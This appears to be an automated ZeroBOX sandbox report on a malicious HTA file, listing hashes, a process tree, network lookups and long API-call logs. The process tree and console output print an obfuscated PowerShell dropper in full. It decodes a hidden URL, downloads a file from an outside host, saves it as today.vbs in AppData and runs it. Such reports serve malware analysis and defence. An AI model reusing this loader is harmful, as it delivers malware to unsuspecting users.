Summary | ZeroBOX

today.hta

Generic Malware Antivirus PowerShell
Category Machine Started Completed
FILE s1_win7_x6403_us Feb. 3, 2025, 9:44 a.m. Feb. 3, 2025, 9:49 a.m.
Size 31.2KB
Type HTML document, ASCII text, with very long lines
MD5 3765f5e3fc9bd26f39b92ea55cdd57c3
SHA256 851c1678aba9d222fc34bf56bbdf5e4018d9e0937b2b8b75a4269da92e6fbc8c
CRC32 76CBD2DF
ssdeep 384:yXtAysbi3UKk+dxH97SNRMNsCx8sXoqw85RHEPSByYn4BYN+vR9/YEkiAlr266g3:eAy6GVk+dOazdtFPEY0yl6gsmfV7
Yara None matched

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\today.hta

    1156
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function NA($iBDUWveK, $kacHvkg){[IO.File]::WriteAllBytes($iBDUWveK, $kacHvkg)};function O($iBDUWveK){if($iBDUWveK.EndsWith((ct @(340,394,402,402))) -eq $True){Start-Process (ct @(408,411,404,394,402,402,345,344,340,395,414,395)) $iBDUWveK}else{Start-Process $iBDUWveK}};function a($wRoPwidyD){$ZUycrAxw = New-Object (ct @(372,395,410,340,381,395,392,361,402,399,395,404,410));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kacHvkg = $ZUycrAxw.DownloadData($wRoPwidyD);return $kacHvkg};function ct($koLce){$GYtomjgIU=294;$CfUes=$Null;foreach($orCECxg in $koLce){$CfUes+=[char]($orCECxg-$GYtomjgIU)};return $CfUes};function Lbu(){$Xr = $env:APPDATA + '\';$M = a (ct @(398,410,410,406,409,352,341,341,403,415,396,399,402,395,412,399,395,413,343,340,393,405,403,341,410,405,394,391,415,340,412,392,409));$h = $Xr + 'today.vbs';NA $h $M;O $h;;;;}Lbu;

      316

Name Response Post-Analysis Lookup
myfileview1.com 195.66.213.164
IP Address Status Action
164.124.101.2 Active Moloch
195.66.213.164 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: sl3, Tls"."
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: At line:1 char:405
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + function NA($iBDUWveK, $kacHvkg){[IO.File]::WriteAllBytes($iBDUWveK, $kacHvkg
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: )};function O($iBDUWveK){if($iBDUWveK.EndsWith((ct @(340,394,402,402))) -eq $Tr
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: ue){Start-Process (ct @(408,411,404,394,402,402,345,344,340,395,414,395)) $iBDU
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: WveK}else{Start-Process $iBDUWveK}};function a($wRoPwidyD){$ZUycrAxw = New-Obje
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: ct (ct @(372,395,410,340,381,395,392,361,402,399,395,404,410));[Net.ServicePoin
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: tManager]:: <<<< SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kacHvkg
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: = $ZUycrAxw.DownloadData($wRoPwidyD);return $kacHvkg};function ct($koLce){$GYto
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: mjgIU=294;$CfUes=$Null;foreach($orCECxg in $koLce){$CfUes+=[char]($orCECxg-$GYt
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: omjgIU)};return $CfUes};function Lbu(){$Xr = $env:APPDATA + '\';$M = a (ct @(39
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: 93,405,403,341,410,405,394,391,415,340,412,392,409));$h = $Xr + 'today.vbs';NA
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: $h $M;O $h;;;;}Lbu;
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: Exception calling "DownloadData" with "1" argument(s): "Unable to connect to th
console_handle: 0x0000011b
1 1 0

WriteConsoleW

buffer: e remote server"
console_handle: 0x00000127
1 1 0

WriteConsoleW

buffer: At line:1 char:491
console_handle: 0x00000133
1 1 0

WriteConsoleW

buffer: + function NA($iBDUWveK, $kacHvkg){[IO.File]::WriteAllBytes($iBDUWveK, $kacHvkg
console_handle: 0x0000013f
1 1 0

WriteConsoleW

buffer: )};function O($iBDUWveK){if($iBDUWveK.EndsWith((ct @(340,394,402,402))) -eq $Tr
console_handle: 0x0000014b
1 1 0

WriteConsoleW

buffer: ue){Start-Process (ct @(408,411,404,394,402,402,345,344,340,395,414,395)) $iBDU
console_handle: 0x00000157
1 1 0

WriteConsoleW

buffer: WveK}else{Start-Process $iBDUWveK}};function a($wRoPwidyD){$ZUycrAxw = New-Obje
console_handle: 0x00000163
1 1 0

WriteConsoleW

buffer: ct (ct @(372,395,410,340,381,395,392,361,402,399,395,404,410));[Net.ServicePoin
console_handle: 0x0000016f
1 1 0

WriteConsoleW

buffer: tManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kacHvkg = $ZUy
console_handle: 0x0000017b
1 1 0

WriteConsoleW

buffer: crAxw.DownloadData <<<< ($wRoPwidyD);return $kacHvkg};function ct($koLce){$GYto
console_handle: 0x00000187
1 1 0

WriteConsoleW

buffer: mjgIU=294;$CfUes=$Null;foreach($orCECxg in $koLce){$CfUes+=[char]($orCECxg-$GYt
console_handle: 0x00000193
1 1 0

WriteConsoleW

buffer: omjgIU)};return $CfUes};function Lbu(){$Xr = $env:APPDATA + '\';$M = a (ct @(39
console_handle: 0x0000019f
1 1 0

WriteConsoleW

buffer: 93,405,403,341,410,405,394,391,415,340,412,392,409));$h = $Xr + 'today.vbs';NA
console_handle: 0x000001b7
1 1 0

WriteConsoleW

buffer: $h $M;O $h;;;;}Lbu;
console_handle: 0x000001c3
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000001cf
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000001db
1 1 0

WriteConsoleW

buffer: Exception calling "WriteAllBytes" with "2" argument(s): "Value cannot be null.
console_handle: 0x000001fb
1 1 0

WriteConsoleW

buffer: Parameter name: bytes"
console_handle: 0x00000207
1 1 0

WriteConsoleW

buffer: At line:1 char:58
console_handle: 0x00000213
1 1 0

WriteConsoleW

buffer: + function NA($iBDUWveK, $kacHvkg){[IO.File]::WriteAllBytes <<<< ($iBDUWveK, $k
console_handle: 0x0000021f
1 1 0

WriteConsoleW

buffer: acHvkg)};function O($iBDUWveK){if($iBDUWveK.EndsWith((ct @(340,394,402,402))) -
console_handle: 0x0000022b
1 1 0

WriteConsoleW

buffer: eq $True){Start-Process (ct @(408,411,404,394,402,402,345,344,340,395,414,395))
console_handle: 0x00000237
1 1 0

WriteConsoleW

buffer: $iBDUWveK}else{Start-Process $iBDUWveK}};function a($wRoPwidyD){$ZUycrAxw = Ne
console_handle: 0x00000243
1 1 0

WriteConsoleW

buffer: w-Object (ct @(372,395,410,340,381,395,392,361,402,399,395,404,410));[Net.Servi
console_handle: 0x0000024f
1 1 0

WriteConsoleW

buffer: cePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kacHvkg
console_handle: 0x0000025b
1 1 0

WriteConsoleW

buffer: = $ZUycrAxw.DownloadData($wRoPwidyD);return $kacHvkg};function ct($koLce){$GYto
console_handle: 0x00000267
1 1 0

WriteConsoleW

buffer: mjgIU=294;$CfUes=$Null;foreach($orCECxg in $koLce){$CfUes+=[char]($orCECxg-$GYt
console_handle: 0x00000273
1 1 0

WriteConsoleW

buffer: omjgIU)};return $CfUes};function Lbu(){$Xr = $env:APPDATA + '\';$M = a (ct @(39
console_handle: 0x0000027f
1 1 0

WriteConsoleW

buffer: 93,405,403,341,410,405,394,391,415,340,412,392,409));$h = $Xr + 'today.vbs';NA
console_handle: 0x00000297
1 1 0

WriteConsoleW

buffer: $h $M;O $h;;;;}Lbu;
console_handle: 0x000002a3
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000002af
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000002bb
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003035a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303ca0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303ca0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303ca0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303360
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303360
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303360
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303360
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303360
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303360
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303ca0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303ca0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303ca0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003039a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003039a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003039a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003039a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003039a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003039a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003039a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003039a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003039a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003039a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303ea0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303ea0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303ea0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303ea0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303ea0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303ea0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303ea0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303ea0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303ea0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303ea0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303ea0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303ea0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303ea0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303ea0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303f20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303f20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303f20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303f20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303f20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303f20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303f20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303f20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303e20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303e20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303e20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00303e20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 316
region_size: 1376256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 316
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x719b1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 316
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x719b2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0250a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02517000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02502000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02515000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0250c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02680000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02503000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02504000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02505000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02506000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02507000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02508000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02509000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ed000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ee000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
